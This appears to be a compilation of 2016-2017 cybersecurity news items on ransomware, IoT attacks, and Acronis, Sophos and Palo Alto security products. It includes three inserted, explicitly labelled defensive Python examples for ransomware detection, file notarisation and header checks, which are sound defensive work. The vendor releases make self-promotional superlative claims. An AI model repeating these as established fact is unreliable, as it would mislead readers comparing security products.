Expensive Home Devices Will Be Held To Ransom

Ransomware has become a major problem and is one of the scourges of the modern Internet, allowing cyber criminals to reap huge profits by locking up users’ files and systems. The gold-rush mentality has not only pushed more and more cyber criminals to distribute ransomware, but also contributed to the rise of Ransomware-As-A-Service and other specializations in the cyber criminal underworld.

These specialists are now looking to expand their attack reach by exploiting the massive increase in expensive connected home devices. Smart TVs, smart toys and other smart appliances can run into thousands of dollars and users are generally not aware of the threats to these devices, making them an attractive target for cyber criminals.


IoT Devices Will Be Hijacked and Used in DDoS Attacks

In 2017, we saw massive DDoS attacks that used hundreds of thousands of compromised IoT devices in people’s homes and workplaces to generate traffic. This is not expected to change, with cyber criminals continuing to exploit the poor security settings and management of home IoT devices.

Furthermore, the inputs and sensors of these devices will also be hijacked, with attackers feeding audio, visual or other faked inputs to make these devices do what they want rather than what users expect them to do.

 

IoT Devices Will Provide Persistent Access to Home Networks

Beyond DDoS attacks and ransomware, home IoT devices will be compromised by cyber criminals to provide persistent access to a victim’s network. Home users generally do not consider the cyber security implications of their home IoT devices, leaving default settings and not vigilantly updating them like they do with their computers.

Persistent access means that no matter how many times a victim cleans or protects their computer, the attacker will always have a backdoor into the victim’s network and the systems that connect to it.


Palo Alto Networks : Not Enough Cybersecurity Staff In Healthcare

Palo Alto Networks revealed that despite an increase in cybersecurity budgets, there is a lack of dedicated cybersecurity staff in the healthcare industry.

 

Palo Alto Networks : Not Enough Cybersecurity Staff In Healthcare

SINGAPORE, 29 November 2017 – As the adoption of digital technology in the healthcare industry accelerates, there is an increasing need to protect another side of patients’ and healthcare organisations’ well-being – the security of their personal data. This emphasis on protecting data and mitigating cyberthreats is reflected in the industry’s significant investment into cybersecurity.

According to a recent survey by Palo Alto Networks, about 70 percent of healthcare organisations in Asia-Pacific say that 5 to 15 percent of their organisation’s IT budget is allocated to cybersecurity.

The survey was conducted amongst more than 500 business professionals in APAC, covering Australia, China, Hong Kong, India and Singapore markets.

However, despite substantial budgets, the healthcare industry appears to need to catch up with its peers in terms of cybersecurity talent: only 78 percent have a team dedicated to IT security in their organisations, the lowest among the industries surveyed and well below the industry-wide average of 86 percent.

 

Risk factors

Aside from monetary loss associated with data breaches and availability of connected devices which monitor patient lives, healthcare professionals are most worried about the loss of clients’ contacts, financial or medical information – 30 percent have cited loss of details as key. Fear of damaging the company’s reputation among clients comes next at 22 percent, followed by 17 percent citing company downtime while a breach is being fixed as a concern.

Cybersecurity risks in healthcare organisations are also amplified with BYOD (Bring Your Own Device), with 78 percent of organisations allowing employees to access work-related information with their own personal devices such as their mobile phones and computers. In addition to this, 69 percent of those surveyed say they are allowed to store and transfer their organisation’s confidential information through their personal devices.

While 83 percent claimed there are security policies in place, only 39 percent admit to reviewing these policies more than once a year – lower than the 51 percent of respondents from the finance industry, a sector also known to hold sensitive client data.


Call to get in shape for the future

As more healthcare organisations fall prey to cyberattacks, such as ransomware, a lapse in data security is a real threat to the industry, hence organisation-wide education and awareness are crucial towards ensuring that the right preventive measures are implemented and enforced.

54 percent of the respondents cited an inability to keep up with evolving solutions as a barrier to ensuring cybersecurity in their organisations, and 63 percent of respondents pointed to an ageing internet infrastructure as the likely main cause of cyberthreats, should they occur.

 

Palo Alto Networks Tips For Healthcare Organisations

Here are some tips for healthcare organisations:

  • Ensure that medical devices are equipped with up-to-date firmware and security patches to address cybersecurity risks. Medical devices are notoriously vulnerable to cyberattacks because security is often an afterthought when the devices are designed and maintained by the manufacturer. These precautionary measures may include keeping an inventory of all medical devices, assessing the network architecture and determining a patch management plan for medical devices, as well as developing a plan to migrate medical devices to a dedicated medical device segment.
  • Apply a zero trust networking architecture for hospital networks, making security ubiquitous throughout, not just at the perimeter. Healthcare organisations should look to segment devices and data based on their risk, inspecting network data as it flows between segments, and requiring authentication to the network and to any application for any user on the network.
  • Practices such as BYOD and some employees’ ability to store and transfer confidential information through their personal devices put them at a higher risk of phishing attacks. To prevent this, healthcare providers should ensure that staff undergo regular end-user security training to reduce successful phishing. Cybersecurity best practices can be taught as a new hire class for every employee.
  • As healthcare organisations migrate portions of their critical infrastructure and applications to the cloud, it becomes imperative for an advanced and integrated security architecture to be deployed to prevent cyberattacks on three fronts: the network, the endpoint and the cloud. Traditional antivirus will not be effective against advanced malware such as ransomware, which continuously changes to avoid detection.


The Trend Micro Red Code 2017 Key Takeaway Points

At the side of Trend Micro Red Code 2017, Trend Micro and Cyber Security Malaysia gave us a briefing on the key takeaway points from the cybersecurity conference.

The Trend Micro team comprised Goh Chee Hoh (Trend Micro Malaysia Managing Director), Ryan Flores (Senior Manager, Future Threat Research, Trend Micro AP) and Law Chee Wan (Technical Sales, Trend Micro Malaysia). Cyber Security Malaysia was represented by Dr. Aswami Ariffin (Senior VP, CyberDEF@CSRS).

 

The Trend Micro Red Code 2017 Key Takeaway Points

Cybersecurity Best Practices

  • Keep legacy and current systems secure: There are organizations still using Windows XP, Vista or 7, for all of which Microsoft has ended support. This means there will no longer be security patches or updates, leaving these systems vulnerable to cyberattacks. The recommendation is to quickly move to a new system or keep the current ones secure with third-party security software.
  • Protect data storage systems: Wherever data is – on-premise, cloud, or in virtualized or hybrid environments – it has to be protected.
  • Detect/prevent breaches: Targeted attacks can breach your organization without ever alerting traditional early warning and defense systems. Fail to spot an incursion, and you could be hit with industry fines, reputation damage and legal costs.
  • Protect information on endpoints: Your organization could have information residing on mobile devices, laptops, and multiple virtual and physical endpoints. The more endpoints, the greater the risk surface.
  • Data encryption: Encrypted data are “useless” to a hacker without the decryption key. It is imperative to encrypt sensitive data both in transit and at rest.
  • Backup of data: It is extremely important to have backups of consumer data. In the event of a breach in which all information is stolen or encrypted by the hacker, the organization would at least have the backups to carry on daily service while trying to resolve the issue.
  • Frequent assessments: Regular “checkups” on the capabilities of the system, as well as on the knowledge and education of employees, are important. Trend Micro offers server assessments and also recommends that the people within the organization be assessed via methods such as sending out test “phishing” emails.

 

Cybersecurity Awareness

  • Cybersecurity awareness programs help get employees up to speed with the latest attacks, safe internet practices, security policies, and how to spot a security threat.
  • Within an organization, there must be security policies governing the use of data and access to certain systems and programs.

 

Multi-Layered Security

To mitigate the risk of infection as effectively as possible, organizations should take a layered approach to security – from the gateway to the network, server and endpoint.

  1. Email and Web Gateway Protection
    This gives a good chance of preventing most ransomware from reaching your users – whether via a phishing email or a malicious website.
  2. Endpoint Security
    For the small percentage of ransomware threats that might make it through the web/email gateway protection, endpoint security monitors for suspicious behavior, enforces application whitelists and provides vulnerability shielding to protect against the unpatched vulnerabilities that ransomware often takes advantage of.
  3. Network Defense
    This layer guards against ransomware that spreads into the organization via network protocols.
  4. Server Protection
    This is where most of the organization’s critical enterprise data will reside. It is essential to ensure that any unpatched vulnerabilities are protected from ransomware via virtual patching, through a security solution that can monitor for lateral movement and file integrity.
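The Endpoint Security layer above relies on watching behaviour rather than matching signatures. What follows is an added example, not Trend Micro’s code or any product’s detection logic, of the kind of heuristic such a layer applies: it walks a constructed file-event log and flags a process that makes many high-entropy, extension-changing writes across several directories inside a short window, while leaving a word processor and an archiver alone. The event format, process names, paths and thresholds are all assumptions made for illustration.

```python
"""Behaviour-based ransomware heuristic over a constructed file-event log.

Added example, not code from Trend Micro or any product on this page. The event
format, process names, paths and thresholds are assumptions for illustration.
"""
import math
import posixpath
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class FileEvent:
    ts: float          # seconds since monitoring started
    process: str       # name of the writing process
    path: str          # file written (POSIX paths so the example runs anywhere)
    renamed_from: str  # previous name if the write followed a rename, else ""
    data: bytes        # leading bytes of the new content (constructed)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for ciphertext or compressed data,
    around 4 to 5 for plain text."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


# Thresholds are assumptions: one process producing many high-entropy writes
# that also change the file extension, across several directories, inside a
# short window is the pattern crypto-ransomware leaves behind.
WINDOW_SECONDS = 10.0
MIN_SUSPICIOUS_WRITES = 5
MIN_DIRECTORIES = 2
ENTROPY_THRESHOLD = 7.0


def is_suspicious_write(ev: FileEvent) -> bool:
    """A rename that swaps the extension plus high-entropy content."""
    if not ev.renamed_from:
        return False
    ext_changed = posixpath.splitext(ev.renamed_from)[1] != posixpath.splitext(ev.path)[1]
    return ext_changed and shannon_entropy(ev.data) >= ENTROPY_THRESHOLD


def detect(events):
    """Return {process: timestamp of first alert} for every process whose
    suspicious writes cross the thresholds within a sliding window."""
    alerts = {}
    recent = defaultdict(list)  # process -> suspicious events still in window
    for ev in sorted(events, key=lambda e: e.ts):
        if not is_suspicious_write(ev):
            continue
        window = recent[ev.process]
        window.append(ev)
        while window and ev.ts - window[0].ts > WINDOW_SECONDS:
            window.pop(0)
        dirs = {posixpath.dirname(e.path) for e in window}
        if len(window) >= MIN_SUSPICIOUS_WRITES and len(dirs) >= MIN_DIRECTORIES:
            alerts.setdefault(ev.process, ev.ts)
    return alerts


HIGH_ENTROPY = bytes(range(256))  # constructed stand-in for ciphertext (8.0 bits/byte)
PLAIN_TEXT = b"Quarterly report: revenue up, costs flat. " * 6


def sample_events():
    """Constructed log: an office app saving text, an archiver writing a
    compressed (high-entropy) file without renaming anything, and a process
    that rewrites documents in place as high-entropy .locked files."""
    events = [
        FileEvent(0.5, "soffice", "/home/ana/Documents/report.odt", "", PLAIN_TEXT),
        FileEvent(1.0, "7z", "/home/ana/Documents/report.7z", "", HIGH_ENTROPY),
    ]
    dirs = ["/home/ana/Documents", "/home/ana/Pictures", "/mnt/share/finance"]
    for i in range(6):
        d = dirs[i % len(dirs)]
        events.append(FileEvent(2.0 + i * 0.3, "updater",
                                f"{d}/file{i}.locked", f"{d}/file{i}.odt", HIGH_ENTROPY))
    return events


if __name__ == "__main__":
    for proc, ts in detect(sample_events()).items():
        print(f"ALERT at t={ts:.1f}s: {proc} shows ransomware-like file activity")
```

Requiring the rename and the entropy jump together is what keeps the archiver out of the alerts: compression produces high-entropy output too, but it creates a new file rather than rewriting the original under a new extension. Real endpoint products layer more signals on top of this (decoy files, process reputation, rollback of the affected files), and the thresholds here would need tuning against a site’s own baseline before use.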


Get The New Acronis Backup 12.5 Today!

June 1, 2017: Acronis today announced the latest release of Acronis Backup 12.5. The new Acronis Backup 12.5 comes in two editions: Standard and Advanced, with an easy in-place upgrade.

Acronis Backup 12.5 allows businesses to start small with Acronis Backup 12.5 Standard edition and scale to Acronis Backup 12.5 Advanced when necessary, simply by changing license keys. This also gives Acronis partners the flexibility to meet the needs of small and large businesses with the same product.

Acronis Backup 12.5 also brings the cost down by as much as 30 percent compared to its competitors.

 

New Features in Acronis Backup 12.5 Advanced edition

Building upon the existing ease of use, reliability, and new hybrid cloud architecture of Acronis Backup 12, the new advanced functionality creates a powerful, feature-rich solution that supports more than 20 platforms.

These include Windows, Office 365, Azure, Linux, Mac OS X, Oracle, VMware, Hyper-V, Red Hat Virtualization, Linux KVM, Citrix XenServer, iOS and Android:

  • Unified web interface for the entire infrastructure
  • Admin roles and delegations for distributed infrastructures
  • Support for six hypervisors to provide migration platform options
  • Bare-metal recovery automation and remote boot media control to reduce RTO of remote site recovery
  • SAN storage snapshots to reduce hypervisor resource utilization
  • Oracle backup and granular recovery
  • Advanced tape support for increased granularity and simplified management
  • Advanced reporting for detailed insights and corporate compliance
  • Disaster recovery capability for emergency data recovery locally and in the cloud
  • Backup validation process ensures recoverability
  • Acronis Notary to ensure the authenticity of data

 

New Features in both Standard and Advanced editions

Businesses of all sizes will benefit from more than 170 advancements common to both editions, addressing today’s hybrid cloud environment and setting Acronis apart from the competition. Highlights include:

  • Customizable dashboards for quick insights into the backup infrastructure
  • Acronis Active Protection to stop ransomware attacks
  • Acronis Instant Restore for 15-second RTOs
  • Acronis vmFlashback for quick incremental recovery of virtual machines

 

A New Generation of Data Protection

More than 500 Acronis engineers globally are engaged in the innovation and development of Acronis Backup 12.5 Standard and Advanced editions. As a result, Acronis added private and public cloud support for backing up and migrating workloads as well as reliable cloud storage.

The release delivers the industry’s first and only data protection against ransomware with automated restoration of damaged data.


Acronis Backup 12.5 also introduces new technology that enables users to verify the backup integrity before its restoration, improving regulatory compliance and data integrity with blockchain.

  • Backup of Amazon EC2 instances, Microsoft Azure VMs and Office 365 mailboxes
  • Acronis Active Protection to intelligently detect and block ransomware attacks, such as WannaCry, with instant restoration of any compromised data
  • Acronis Notary to prove a file is authentic and unchanged since it was backed up


Sophos CryptoGuard Anti-Ransomware Protection Launched!

April 25, 2017 – Sophos (LSE:SOPH) today announced that its next-generation anti-ransomware CryptoGuard technology is now available with its Sophos Server Protection products.

With this optimisation, Sophos Server Protection now has signature-less detection capabilities to combat ransomware, similar to Sophos Intercept X for endpoints. In September 2016, Sophos launched Sophos Intercept X with CryptoGuard, which stops the spontaneous encryption of data by ransomware within seconds of detection.

 

Sophos CryptoGuard

By adding CryptoGuard to server security, Sophos is closing a critical gap by preventing ransomware attacks that could come in through rogue, guest or remote access users or other weaknesses in a company’s network. For example, if a company allows bring-your-own-laptops on the network, remote access for employees or is victimised by an insider cyber threat, servers become highly susceptible to ransomware.

Additionally, network shares on servers are high-value targets as they contain proprietary financials, personally identifiable information and other key data, and should be protected as such.

“Servers are considered the jackpot for cybercriminals, since they can store confidential corporate and employee information, medical records with social security numbers or private customer documents. It would be devastating for organisations to lose this kind of sensitive data to ransomware,” said Dan Schiappa, senior vice president and general manager of Sophos’ Enduser and Network Security Groups. “Most organisations back-up their data, but recovery from a backup is not always easy. Businesses, schools or hospitals do not want the liability, hassle and operational disruption required to restore from a backup. Anti-ransomware technology is a critical layer for the protection and ongoing accessibility of the information that resides on servers. Sophos has optimised its Server Protection products with CryptoGuard, adding another layer of next-gen protection to block this pervasive and highly-damaging cyber threat.”


Sophos has also expanded Synchronised Security by adding Sophos Security Heartbeat capabilities to Sophos Central Server Protection Advanced. By adding Security Heartbeat to servers, an IT administrator can now leverage Sophos XG Firewall to automatically isolate infected servers and endpoints to identify and respond to the source of compromises faster.

Sophos Central Server Protection also includes Malicious Traffic Detection, which monitors for traffic to Command and Control servers and application whitelisting with one-click Server Lockdown, which secures servers in a safe state and prevents unauthorised applications from running.

Sophos Server Protection products with CryptoGuard capabilities now include Central Server Protection Advanced on the cloud-based Sophos Central platform and Sophos Server Protection Enterprise, which is managed with a traditional on-premise console.

Pricing for the complete range of Sophos Server Protection products is available from authorised Sophos Partners worldwide.

 


Acronis True Image Leads Competition In Ransomware Protection

April 24, 2017 — Acronis today announced the latest product comparison report from MRG Effitas, a UK-based independent IT security research company that provides a range of efficacy assessment and assurance services. The report conclusively demonstrated that Acronis True Image 2017 New Generation is the most advanced consumer backup solution as measured by ransomware protection, performance, usability, and feature set.

 

Acronis True Image Leads Competition In Ransomware Protection

MRG Effitas compared Acronis True Image 2017 New Generation, CrashPlan Home 4.8.0, EaseUS TODO Backup Home 10.0, Genie Timeline Home 2016, IDrive 6.5.1.23, Macrium Reflect Home 6.3.1655, NovaBACKUP 18.5 Build 926, and Paragon Backup and Recovery 16. The result was a comprehensive 2017 report entitled “MRG Effitas Comparative Assessment of Data Protection/Backup Products on Protection, Performance, and Usability.”

The report singled out Acronis True Image 2017 as the only solution that protected data against every assessed ransomware threat, thanks to the innovative Acronis Active Protection technology released earlier this year.

“Among all the products we tested, only Acronis True Image 2017 New Generation was able to protect the backups from every ransomware family tested,” states the report’s final conclusion. “The other solutions have basically zero backup protection when it comes to ransomware… Based on the tests, only Acronis’s backup file is protected against the tested ransomware.”


“Ransomware currently represents a significant risk to end users, businesses and government institutions. Anti-malware technologies can’t provide 100 percent protection against this class of threat. What this test shows is that anyone relying on a backup solution to mitigate against the risks imposed by ransomware if their anti-malware technology fails should not just assume that it will be effective without independent, third party verification,” said Chris Pickard, CEO of MRG Effitas.

That’s not the only finding that pointed to the Acronis solution as the optimal choice. According to MRG Effitas, Acronis True Image 2017 also came first in 18 of 24 performance tests, and when it didn’t win, it finished second.

“These results confirm our internal testing,” said John Zanni, CMO of Acronis. “Acronis True Image is the fastest home backup on the market and the only product that is able to protect itself, and the data, from ransomware. The same anti-ransomware technology is currently being rolled out across the full range of our business products and we’ll continue to invest in R&D, making data protection fast, easy, complete — for everybody.”

 


Acronis True Image 2017 New Generation Launched!

January 19, 2017 – Acronis, a global leader in hybrid-cloud data protection and storage, today announced Acronis True Image 2017 New Generation with Acronis Active Protection — active protection against ransomware attacks on user data, Acronis Notary — blockchain-based data certification and verification capabilities — and Acronis ASign — the most consumer-friendly electronic document signing service.

Acronis True Image is the first and only backup solution in the market that introduces Active Protection technology to detect and prevent ransomware attacks in real-time, automatically recover all data from the backup, self-protect backups and the backup application.

According to the FBI, damages from ransomware exceeded $1 billion in 2016 and are growing at an alarming rate, affecting thousands of people every day. This year, cyber-attacks will increasingly threaten data on every personal computer and Acronis delivers the ultimate protection for user data.

Acronis True Image is the fastest and most complete personal backup solution, outperforming the closest competition by more than two times and protecting data on Windows and Mac computers, iOS and Android mobile devices, and Facebook social network accounts. Acronis True Image delivers ultimate data protection for personal and family data using AES-256 encryption and stores it in multiple destinations, including external drives, NAS devices, network shares, and the secure Acronis Cloud.

 

Acronis True Image 2017 New Generation

Acronis True Image 2017 New Generation is the most secure backup on the market due to new unique data protection capabilities:

  • Acronis Active Protection for real-time active protection against ransomware. Acronis Active Protection identifies unusual activity on computers and prevents malicious applications from damaging user data, backups, and backup software. Cutting-edge behavioral heuristics detect and prevent new and known ransomware attacks, making the backup more secure and reducing the number of times data needs to be restored from the backup.
  • Acronis Notary for Blockchain-based data authentication. Acronis Notary offers certification of the content of any file and verification of content modifications against the original version. Unique, “digital file fingerprints” are stored in a distributed, immutable database based on blockchain technology. Blockchain allows users to verify the authenticity of the information at any time. This is especially important for valuable documents such as contracts, medical records, and financial documents.
  • Acronis ASign for blockchain-based document certification. Acronis ASign allows multiple parties to execute and certify a document with a secure and publicly auditable digital signature. Users can protect their backed-up documents, which are verified with Acronis Notary and electronically signed – all within the same reliable backup solution.
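The Acronis Notary bullet above, like the Backup 12.5 feature earlier on this page that proves a file is unchanged since it was backed up, rests on one mechanism: fingerprint each file at backup time, store the fingerprints where they cannot be quietly rewritten, and compare later. The following is an added example, not Acronis code, that models that mechanism with SHA-256 fingerprints appended to a hash-chained ledger; the entry format is an assumption for illustration and is not the product’s actual blockchain format.

```python
"""Hash-based notarisation of backed-up files with a chained ledger.

Added example, not Acronis code. It models the idea behind Acronis Notary: take
a fingerprint of each file when it is backed up, append it to a ledger in which
every entry commits to the previous one, and later verify that neither the file
nor the ledger was altered. The entry format is an assumption for illustration,
not the product's actual blockchain format.
"""
import hashlib
import json
from dataclasses import dataclass

GENESIS = "0" * 64  # previous-hash value for the first entry


def fingerprint(data: bytes) -> str:
    """SHA-256 hex digest: the file's "digital fingerprint"."""
    return hashlib.sha256(data).hexdigest()


@dataclass
class Entry:
    index: int
    name: str
    digest: str       # fingerprint of the file content at backup time
    prev_hash: str    # entry_hash of the previous entry (chains the ledger)
    entry_hash: str = ""

    def compute_hash(self) -> str:
        """Hash over every field except entry_hash itself."""
        payload = json.dumps([self.index, self.name, self.digest, self.prev_hash])
        return hashlib.sha256(payload.encode()).hexdigest()


class Ledger:
    def __init__(self):
        self.entries = []

    def notarize(self, name: str, data: bytes) -> str:
        """Record a file's fingerprint; returns the new entry's hash, which a
        real deployment would anchor somewhere the attacker cannot rewrite."""
        prev = self.entries[-1].entry_hash if self.entries else GENESIS
        entry = Entry(len(self.entries), name, fingerprint(data), prev)
        entry.entry_hash = entry.compute_hash()
        self.entries.append(entry)
        return entry.entry_hash

    def chain_intact(self) -> bool:
        """Every entry must hash to its stored entry_hash and link to its predecessor."""
        prev = GENESIS
        for i, entry in enumerate(self.entries):
            if (entry.index != i or entry.prev_hash != prev
                    or entry.entry_hash != entry.compute_hash()):
                return False
            prev = entry.entry_hash
        return True

    def verify(self, name: str, data: bytes) -> str:
        """Return 'ok', 'modified', 'unknown' or 'ledger-tampered'."""
        if not self.chain_intact():
            return "ledger-tampered"
        matches = [e for e in self.entries if e.name == name]
        if not matches:
            return "unknown"
        return "ok" if matches[-1].digest == fingerprint(data) else "modified"


def demo() -> dict:
    """Constructed scenario: notarise two files, then check the four outcomes."""
    ledger = Ledger()
    contract = b"Service agreement v1 (constructed sample content)"
    ledger.notarize("contract.pdf", contract)
    ledger.notarize("scan.jpg", b"\xff\xd8\xff constructed image bytes")
    altered = contract + b" (altered after backup)"
    results = {
        "unchanged": ledger.verify("contract.pdf", contract),
        "modified": ledger.verify("contract.pdf", altered),
        "unknown": ledger.verify("notes.txt", b"never notarised"),
    }
    # Someone who alters the file and then edits the stored fingerprint to
    # match still gets caught: the entry no longer hashes to its entry_hash.
    ledger.entries[0].digest = fingerprint(altered)
    results["after_ledger_edit"] = ledger.verify("contract.pdf", altered)
    return results


if __name__ == "__main__":
    for outcome, status in demo().items():
        print(f"{outcome}: {status}")
```

The caveat a practitioner should keep in mind: a chain kept only on the same host proves nothing against an adversary who can regenerate every entry hash, since the rewritten chain validates just as well. That is why the product publishes the fingerprints to a distributed ledger, and why any home-grown version should at least copy the latest entry hash to write-once storage or a second system after every backup run.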

Eugene Kaspersky, chairman and CEO of Kaspersky Lab, said: “The world is facing a rising and increasingly dangerous tide of ransomware affecting individuals and businesses alike. Of course, ideally you should never pay criminals if your data is encrypted by ransomware; that’s all very well in theory, but when it’s your family photos or business documents encrypted, the idealism can swiftly go out the window. There are many measures that can be taken to avoid the damage from ransomware, but a high-end Internet security suite and a reliable backup disconnected from the system is still essential to ensure business continuity if the worst does still happen. And I welcome Acronis’s introduction of backup suited to this trend.”


Besides the unique new capabilities, Acronis True Image 2017 New Generation introduces many more improvements and innovative features to secure Acronis’ position as the leading, fastest, and most innovative consumer backup provider:

  • Easy to use, modern interface: A touch-friendly interface across all devices with an easy-to-use web interface for remote data access and management.
  • Additional features for Mac users: Unmounted NAS support for source and backup destinations, wireless backup of mobile devices to Mac computers with local data browsing capabilities; file notarization and electronic signatures via Acronis Notary and Acronis ASign, and support for Mac OS X Sierra.
  • Complete mobile backup experience: AES-256 data encryption, file preview and recovery, browsing of all cloud backups from a mobile device.
  • Backup and recovery capabilities for Facebook accounts: Browse and recover Facebook account data to an existing or new account, with data encrypted and stored in the Acronis Cloud.

 

Acronis True Image 2017 New Generation Pricing and Availability

Acronis True Image 2017 New Generation is a new premium subscription for the award-winning Acronis True Image backup solution. Special upgrade pricing is available for the existing Acronis True Image customers.

The Acronis True Image 2017 New Generation will be available in 1, 3 and 5 computer offerings, at an MSRP of US$99.99, US$149.99 and US$159.99 respectively. All subscriptions are for 1 year and include 1TB of Acronis Cloud Storage.

 


Sophos Predicts Top 10 Cyber Security Trends for 2017

22 December 2016 – 2016 saw a huge number and variety of cyber attacks, ranging from a high-profile DDoS using hijacked Internet-facing security cameras to the alleged hacking of party officials during the US election. The year also saw a rising tide of data breaches, from organizations big and small, and significant losses of people’s personal information. With the year almost over, Joergen Jakobsen, regional vice president for Asia-Pacific and Japan (APJ) at Sophos, looks into his crystal ball to predict the top cyber security trends for 2017:

#1 : Shift from exploitation to targeted social attacks.

Cybercriminals are getting better at exploiting the ultimate vulnerability – humans. Ever more sophisticated and convincing targeted attacks seek to coax users into compromising themselves. For example, it is common to see an email that addresses the recipient by name and claims they have an outstanding debt that the sender has been authorized to collect. Applying shock by pretending to be a borrowing authority or law enforcement is a common and effective tactic. The email directs users to a malicious link that they are panicked into clicking on, opening them up to attack. Such phishing attacks can no longer be recognized by obvious mistakes.

#2 : Financial infrastructure at greater risk of attack.

The use of targeted phishing and “whaling” continues to grow. These attacks use detailed information about company executives to trick employees into paying fraudsters or compromising accounts. We also expect more attacks on critical financial infrastructure, such as the attack involving SWIFT-connected institutions which cost the Bangladesh Central Bank $81 million in February. SWIFT recently revealed that there have been other such attacks and it expects to see more, stating in a leaked letter to client banks: “The threat is very persistent, adaptive and sophisticated – and it is here to stay”.

#3 : Exploitation of the Internet’s inherently insecure infrastructure.

All Internet users rely on ancient foundational protocols, and their ubiquity makes them nearly impossible to revamp or replace. These archaic protocols that have long been the backbone of the Internet and business networks are sometimes surprisingly flaky. For example, attacks against BGP (Border Gateway Protocol) could potentially disrupt, hijack, or disable much of the Internet. And the DDoS attack on Dyn in October (launched by a myriad of IoT devices), took down the DNS provider and, along with it, access to part of the internet. It was one of the largest assaults seen and those claiming responsibility said that it was just a dry run. Large-scale ISPs and enterprises can take some steps to respond, but these may well fail to prevent serious damage if individuals or states choose to exploit the Internet’s deepest security flaws.

#4 : Increased attack complexity.

Attacks increasingly bring together multiple technical and social elements, and reflect careful, lengthy probing of the victim organization’s network. Attackers compromise multiple servers and workstations long before they start to steal data or act aggressively. Closely managed by experts, these attacks are strategic, not tactical, and can cause far more damage. Patient and evasive, they are a very different world from the pre-programmed and automated malware payloads we used to see.

#5 : Growth of malvertising and corruption of online advertising ecosystems.

Malvertising, which spreads malware through online ad networks and web pages, has been around for years. But in 2016, we saw much more of it. These attacks highlight larger problems throughout the advertising ecosystem, such as click fraud, which generates paying clicks that don’t correspond to real customer interest. Malvertising has actually generated click fraud, compromising users and stealing from advertisers at the same time.

#6 : Ransomware evolves.

As more users recognize the risks of ransomware attack via email, criminals are exploring other vectors. Some are experimenting with malware that reinfects later, long after a ransom is paid, and some are starting to use built-in tools and no executable malware at all to avoid detection by endpoint protection code that focuses on executable files. Recent examples have offered to decrypt files after the victim shared the ransomware with two friends, and those friends paid to decrypt their files. Ransomware authors are also starting to use techniques other than encryption, for example deleting or corrupting file headers. And finally, with “old” ransomware still floating around the web, users may fall victim to attacks that can’t be “cured” because payment locations no longer work.
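The section above notes that some ransomware now deletes or corrupts file headers instead of encrypting whole files. The following is an added example, not code from the original article: a small integrity sweep that compares each file’s leading bytes with the magic number expected for its extension and flags headers that are missing or mismatched, the trace this kind of corruption leaves behind. The signature table and the sample files are constructed for the demo.

```python
# Added example (not from the original article): flag files whose leading
# bytes no longer match the signature expected for their extension, a
# symptom of ransomware that overwrites or deletes file headers.
import os
import tempfile

# Well-known magic numbers for a few common formats (constructed subset).
SIGNATURES = {
    ".pdf": [b"%PDF-"],
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".zip": [b"PK\x03\x04"],
    ".docx": [b"PK\x03\x04"],  # OOXML documents are ZIP containers
    ".gif": [b"GIF87a", b"GIF89a"],
}

def header_status(path):
    """Return 'ok', 'corrupt', 'empty' or 'unknown' for one file."""
    ext = os.path.splitext(path)[1].lower()
    expected = SIGNATURES.get(ext)
    if expected is None:
        return "unknown"  # no signature on record for this extension
    with open(path, "rb") as fh:
        head = fh.read(max(len(s) for s in expected))
    if not head:
        return "empty"    # header (or whole file) was zeroed or truncated
    return "ok" if any(head.startswith(s) for s in expected) else "corrupt"

def scan_tree(root):
    """Walk a directory tree and return {path: status} for every file."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            results[path] = header_status(path)
    return results

def suspicious(results):
    """Paths whose header is missing or does not match their extension."""
    return sorted(p for p, s in results.items() if s in ("corrupt", "empty"))

def demo():
    """Constructed sample tree: intact PDF, PDF with overwritten header,
    PNG truncated to zero bytes, and a text file with no known signature."""
    root = tempfile.mkdtemp()
    samples = {
        "report.pdf": b"%PDF-1.7\n%constructed sample\n",
        "scan.pdf": b"\x00\x00\x00\x00\x00rest of file...",
        "xray.png": b"",
        "notes.txt": b"plain text, nothing to check",
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return {os.path.basename(p): s for p, s in scan_tree(root).items()}
```

Run it periodically against a file share and alert on any non-empty result from `suspicious()`, so damaged files are noticed before the next backup cycle overwrites the last good copies.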

#7 : Emergence of personal IoT attacks.

Users of home IoT devices may not notice or even care if their baby monitors are hijacked to attack someone else’s website. But once attackers “own” a device on a home network, they can compromise other devices, such as laptops containing important personal data. We expect to see more of this as well as more attacks that use cameras and microphones to spy on households. Cyber criminals always find a way to profit.

#8 : Rising focus on exploits against virtualized and cloud systems.

Attacks against physical hardware raise the possibility of dangerous new exploits against virtualized cloud systems. Attackers might abuse the host or other guests running on a shared host, attack privilege models, and conceivably access others’ data. And, as Docker and the entire container (or ‘serverless’) ecosystem become more popular, attackers will increasingly seek to discover and exploit vulnerabilities in this relatively new trend in computing. We expect active attempts to operationalize such attacks.

#9 : Destructive DDoS IoT attacks will rise.

In 2016, Mirai, the malware that turns Linux-based systems into remotely controlled “bots” for use in large-scale network attacks, showed the massive destructive potential of DDoS attacks built on insecure consumer IoT (Internet of Things) devices. Mirai’s attacks exploited only a small number of devices and vulnerabilities, and used basic password guessing techniques. However, cybercriminals will find it easy to extend their reach because many IoT devices contain outdated code based on poorly maintained operating systems and applications with well-known vulnerabilities. Expect IoT exploits, better password guessing and more compromised IoT devices being used for DDoS, or perhaps to target other devices in your network.

#10 : Technical attacks against states and societies.

Technology-based attacks have become increasingly political. Societies face growing risks from both disinformation (e.g., “fake news”) and voting system compromise. For instance, researchers have demonstrated attacks that might allow a local voter to fraudulently vote repeatedly without detection. Even if states never engage in attacks against their adversaries’ elections, the perception that these attacks are possible is itself a powerful weapon.


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Kaspersky Lab Finds Security Weaknesses in Clinic IT

25 March 2016 – A Kaspersky Lab Global Research & Analysis Team (GReAT) expert has conducted real field research at one private clinic in an attempt to explore its security weaknesses and how to address them. Vulnerabilities were found in medical devices that opened a door for cybercriminals to access the personal data of patients, as well as their physical well-being.

